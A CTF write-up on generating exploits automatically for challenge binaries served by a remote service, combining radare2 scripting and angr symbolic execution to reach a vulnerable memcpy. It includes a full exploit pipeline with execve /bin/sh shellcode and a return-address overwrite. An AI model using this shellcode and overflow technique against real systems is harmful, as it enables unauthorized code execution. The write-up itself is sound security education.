Hi there!

I guess you all know that feeling of having a working solution for a chall which just fails to yield the flag in time during the CTF. Yep … the solution presented here is one of those cases. Nevertheless, I wanted to do this writeup, since it’s a great opportunity to show some of the capabilities of angr and radare2.

Anyway, enough introductory words, let’s get to the meat. The challenge consisted only of a remote service which, once you connect to it, sends you a base64-encoded x86_64 binary and then waits for your input, which is supposed to exploit the freshly received binary.

Automating the process of retrieving the binary is quite straightforward:

from tasty import *
import base64
binary = 'x.out'
s = Socket(('',20002))

b64 = s.recv_until('\n\n\n')
b64 = b64.replace('\x0a','')

downloaded = base64.b64decode(b64)
#write the decoded binary to disk so that r2 and angr can open it
with open(binary,'wb') as f:
    f.write(downloaded)
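
For readers without the tasty helper library, the same download step can be approximated with the standard library alone. The sketch below is a stand-in under stated assumptions, not the code used during the CTF: connect, recv_until and fetch_binary are hypothetical helpers, and it assumes the service terminates the base64 blob with three newlines, as the listing above suggests.

```python
import base64
import socket


def connect(host, port):
    """Open a TCP connection to the challenge service (host is up to you)."""
    return socket.create_connection((host, port))


def recv_until(sock, marker):
    """Read byte by byte until the data ends with marker or the peer closes."""
    data = b""
    while not data.endswith(marker):
        chunk = sock.recv(1)
        if not chunk:
            break
        data += chunk
    return data


def fetch_binary(sock):
    """Receive the base64 blob, drop the line breaks and decode it."""
    b64 = recv_until(sock, b"\n\n\n").replace(b"\n", b"")
    return base64.b64decode(b64)
```

With a connected socket s, fetch_binary(s) would return the raw bytes of the binary, ready to be written to x.out.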

After downloading a couple of binaries, it turns out that they all follow the same structure, so the problem boils down to automated exploit generation for a well-defined class of binaries. In essence, the binary consists of a loop inside the main function, which parses argv[1] as hex-encoded input and stores it in a global buffer at 0x606080. In addition, there is a large number of functions, each validating 4 bytes of the input at a time, apparently in arbitrary order. If a check fails, the function returns and the program terminates. Thus, all those functions can be interpreted as a binary tree in which every leaf is either the next function or (simplified) an exit().
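
To make that structure concrete, here is a toy model of it in Python. It is only a sketch: make_check and run are hypothetical names, and the real checks are presumably arithmetic conditions rather than the plain equality tests used here.

```python
import binascii


def make_check(offsets, expected):
    """Build a toy check validating 4 buffer bytes (values are made up)."""
    def check(buf):
        return all(buf[o] == e for o, e in zip(offsets, expected))
    return check


def run(hex_input, checks):
    """Mimic main(): hex-decode the input, then walk down the check chain."""
    buf = bytearray(binascii.unhexlify(hex_input))
    for depth, check in enumerate(checks):
        if not check(buf):
            # a failed check corresponds to the function returning early
            return "exit at depth %d" % depth
    return "reached memcpy"


# Two chained checks; the first one reads its bytes in reverse order.
checks = [
    make_check((3, 2, 1, 0), (0x41, 0x42, 0x43, 0x44)),
    make_check((4, 5, 6, 7), (0x01, 0x02, 0x03, 0x04)),
]
```

Each check either passes control to the next level or bails out, which is the binary-tree shape described above.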

All the way down in this tree there is always a function with a memcpy, which copies tons of bytes from the global buffer onto the stack, effectively giving us control over the saved return address.

Consequently, our goal is to get all the way down to the memcpy and take over control. While angr on its own might have been able to symbolically explore the binary all the way to the memcpy, I decided to go another way to speed up the creation of inputs triggering the desired path, for the following reasons:

  1. I was expecting a timeout on the remote connection (as it turned out, this wasn’t a problem)

  2. I didn’t know whether we have to exploit more than one challenge

  3. I noticed that every input byte is only validated once

Thus, the general plan was to use radare for reconstructing the function tree and then use angr to find the right inputs to the individual functions. Since r2pipe offers great scriptability for radare and I didn’t feel like playing with angr.analyses.CFG, I obtained the desired path through the function tree with the following lines of code:

import r2pipe, re

r2 = r2pipe.open(binary)
r2.cmd('aaa') #analyze the binary

#a bunch of regexes for finding different stuff in the disassembly
call_re = re.compile(r'call fcn.([0-9a-fA-F]{8})')
ret_re = re.compile(r'(0x[0-9a-fA-F]{8})\s+.+\s+ret')
addr_re = re.compile(r'\[(0x60[0-9a-fA-F]{4}):1\]')
memcpy_re = re.compile(r'(0x[0-9a-fA-F]{8})\s+.+\s+call sub.memcpy')

to_find = [] #array of (ordered) target functions
to_avoid = [] #to simplify our life, let's avoid all basic-blocks leading to a ret
byte_addresses  = [] #we need this to keep track of the actually validated input-bytes' locations

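addr = 'main'
while True:
    disas= r2.cmd('pdf @ %s'% addr) #disassemble function @ addr

    #the call to the next function in the chain
    m = re.search(call_re,disas)
    if m:
        addr = '0x'+m.group(1)
        to_find.append(int(addr,16))
        print '[+] Found a target %s' % addr

    m = re.search(ret_re,disas)
    if m:
        ret = m.group(1)
        to_avoid.append(int(ret,16))
        print '[+] Found avoid %s' % ret

    #collect the addresses of the input bytes referenced in this function
    mi = re.finditer(addr_re,disas)
    address_local = []
    for m in mi:
        address_local.append(int(m.group(1),16))
    byte_addresses.append(address_local)

    #the function containing the memcpy is the end of the chain
    m = re.search(memcpy_re,disas)
    if m:
        addr = m.group(1)
        to_find.append(int(addr,16))
        print '[+] Found target %s' % addr
        break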

Besides the actual addresses of functions we want to reach, we also save the addresses of the processed input-bytes, in order to construct the right input later on, and the addresses of basic blocks we want to avoid.
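
To see what the regexes pick up without having a binary at hand, they can be run against a few lines of text shaped like r2's pdf output. The excerpt below is hypothetical (addresses and opcode bytes are made up), and scan is an illustrative helper rather than part of the original script.

```python
import re

call_re = re.compile(r'call fcn\.([0-9a-fA-F]{8})')
ret_re = re.compile(r'(0x[0-9a-fA-F]{8})\s+.+\s+ret')
addr_re = re.compile(r'\[(0x60[0-9a-fA-F]{4}):1\]')

# Hypothetical excerpt in the style of `pdf`; not taken from a real binary.
SAMPLE = """\
0x00400b10      0fb60d90552000  movzx ecx, byte [0x6060a7:1]
0x00400b17      0fb61588552000  movzx edx, byte [0x6060a6:1]
0x00400b1e      0fb63580552000  movzx esi, byte [0x6060a5:1]
0x00400b25      0fb63d78552000  movzx edi, byte [0x6060a4:1]
0x00400b2c      e8cffaffff      call fcn.00400600
0x00400b31      c9              leave
0x00400b32      c3              ret
"""


def scan(disas):
    """Return (next target, address of the ret, referenced input bytes)."""
    call = call_re.search(disas)
    ret = ret_re.search(disas)
    return (
        int(call.group(1), 16) if call else None,
        int(ret.group(1), 16) if ret else None,
        [int(m.group(1), 16) for m in addr_re.finditer(disas)],
    )
```

On this excerpt, scan(SAMPLE) yields the call target, the address of the ret and the four buffer addresses in the order they appear in the disassembly.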

The next step is to use angr to systematically solve for the correct input to every function. To do so, we create a new state for every function, mark its inputs (passed in rdi, rsi, rdx and rcx) as symbolic and explore to the desired target, which is always the next address in our to_find array. Unfortunately, angr is sometimes unable to solve a function, and some manual analysis suggested that apparently not every binary is actually solvable. Thus, we need to check whether we were able to reach the desired function, and if not, we exit our script.

import angr,claripy

p = angr.Project(binary)
results = {}
#since some of the inputs byte are not validated at all, let's populate results with dummy bytes
for i in range(0x606080,0x606080+500):
    results[i] = 0xff

for i in range(0,len(to_find)-1):
    f = to_find[i]
    t = to_find[i+1]
    print 'Exploring from 0x%08x to 0x%08x' % (f,t)

    #Set up the state for the function we want to solve
    e = p.factory.entry_state(addr=f)
    rdi = claripy.BVS('rdi', 64)
    rsi = claripy.BVS('rsi', 64)
    rdx = claripy.BVS('rdx', 64)
    rcx = claripy.BVS('rcx', 64)
    e.regs.rdi = rdi
    e.regs.rsi = rsi
    e.regs.rdx = rdx
    e.regs.rcx = rcx

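    #Generate a path_group out of this state and explore
    pg = p.factory.path_group(e)
    pg.explore(find=t, avoid=to_avoid)
    if len(pg.found) == 0:
        #this function could not be solved, give up on this binary
        print "[-] OH NOEZ"
        raise SystemExit(1)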

    #Save the solutions
    found = pg.found[0]
    address_local = byte_addresses[i]
    results[address_local[3]] = found.state.se.any_int(rdi)
    results[address_local[2]] = found.state.se.any_int(rsi)
    results[address_local[1]] = found.state.se.any_int(rdx)
    results[address_local[0]] = found.state.se.any_int(rcx)
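
The bookkeeping in the last four lines can be isolated into a small helper, which makes the reversed pairing between registers and buffer addresses easier to see. This is a sketch only: record is a hypothetical name, and masking each value to its low byte is an assumption on my part that the listing above does not make.

```python
def record(results, address_local, rdi, rsi, rdx, rcx):
    """Store one function's solved arguments at the bytes they came from."""
    # address_local is in disassembly order; as in the listing above,
    # index 0 is paired with rcx and index 3 with rdi.
    for addr, value in zip(address_local, (rcx, rdx, rsi, rdi)):
        # Assumption: only the low byte of each argument matters.
        results[addr] = value & 0xff
    return results


# Small window of the buffer, prefilled with dummy bytes.
results = {addr: 0xff for addr in range(0x606080, 0x606088)}
record(results, [0x606083, 0x606082, 0x606081, 0x606080],
       rdi=0x11, rsi=0x22, rdx=0x33, rcx=0x144)
```

Bytes that no function validates keep their dummy value, which is why results is prefilled before the exploration starts.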

Alright, now we are able to find an input triggering the vulnerable path of a binary given by the service. The last step is the construction of the payload. Luckily, the binaries are compiled with -z execstack, which also makes the .bss section executable. This is great news, since we can simply put shellcode inside the global buffer and jump there. Big kudos to immerse here for scripting up the payload-generation code while I was busy writing the exploration code.

def gen_input(results):
    #let's strip the dummy bytes away
    end = 0x606080+len(results)-1
    while results[end] == 0xff:
        end -=1

    #emit the remaining bytes in address order, hex-encoded
    res = ''
    for addr in range(0x606080,end+1):
        res += "%02x" % results[addr]
    return res

command = "pwd; ls;"
payload_addr = 0x6061ce #this address is static in all binaries

shellcode = assemble("""
; set up argv[]
xor rax, rax
push rax
mov rax, 0x%x
push rax
mov rax, 0x%x
push rax
mov rax, 0x%x
push rax

; do the syscall
mov rsi, rsp
mov rdi, rax
xor rdx, rdx
mov rax, 59
syscall
""" % (
payload_addr + 0x18 +   8,
payload_addr + 0x18 + 8 + 0x30 + 8,
payload_addr + 0x18 + 8 + 0x30,
))

command += "\x00"
command += "A"*(0x30 - len(command))
assert len(command) == 0x30
command += "/bin/sh\x00"
command += "-c" + "\x00"*6

path = gen_input(results)
payload = "A"*0x22  #the padding is static as well
payload += pq(payload_addr + 0x20 + 0x30 + 0x10)
payload += command
payload += shellcode

payload = payload.encode('hex')
payload = path + payload


#Save payload for local testing
with open("payload", "w") as f:
    f.write(payload)
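
The offsets in the listing above are easy to get wrong, so here is a small layout check that rebuilds the raw (pre-hex) payload with a placeholder instead of the real shellcode. It is a sketch under one assumption: that the strings sit exactly where the shellcode expects them, which in turn fixes the address of the first padding byte. build_layout is a hypothetical helper, and struct.pack stands in for pq.

```python
import struct

PAYLOAD_ADDR = 0x6061ce  # static address taken from the listing above


def build_layout(command, shellcode=b"\x90"):
    """Rebuild the raw payload and report where each part would land."""
    cmd = command.encode() + b"\x00"
    cmd += b"A" * (0x30 - len(cmd))            # command slot, padded to 0x30
    blob = cmd + b"/bin/sh\x00" + b"-c" + b"\x00" * 6
    ret = PAYLOAD_ADDR + 0x20 + 0x30 + 0x10    # value for the return address
    raw = b"A" * 0x22 + struct.pack("<Q", ret) + blob + shellcode
    off_cmd = 0x22 + 8                         # padding plus return address
    # Assumption: the command lives at PAYLOAD_ADDR + 0x18 + 8, as the
    # shellcode arguments imply; this pins down where the payload starts.
    start = PAYLOAD_ADDR + 0x18 + 8 - off_cmd
    return raw, {
        "start": start,
        "command": start + off_cmd,
        "binsh": start + off_cmd + 0x30,
        "dash_c": start + off_cmd + 0x30 + 8,
        "shellcode": start + off_cmd + len(blob),
        "ret": ret,
    }


raw, layout = build_layout("pwd; ls;")
```

Under that assumption, the overwritten return address points exactly at the first byte of the shellcode, and the three argv pointers match the three values passed to the assembler template.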

Although the script assembled from the pieces above technically works, there were several problems, which meant we had to fire it tons of times in a while loop. First and foremost, not all binaries appeared to be solvable with the presented method. Additionally, the generated exploit code failed quite often on remote but worked reliably locally, which was quite frustrating. Nevertheless, after running the script a lot, we eventually got some output indicating that we were in /tmp. From there, we could have gone on to locate and cat the flag, which turned out to be in /home/mbrainfuzz/.

Unfortunately, we were not able to figure out the location of the flag file in time and thus couldn’t get the points for it. Nevertheless, it was still nice to use r2 and angr together, and I hope you enjoyed reading this writeup.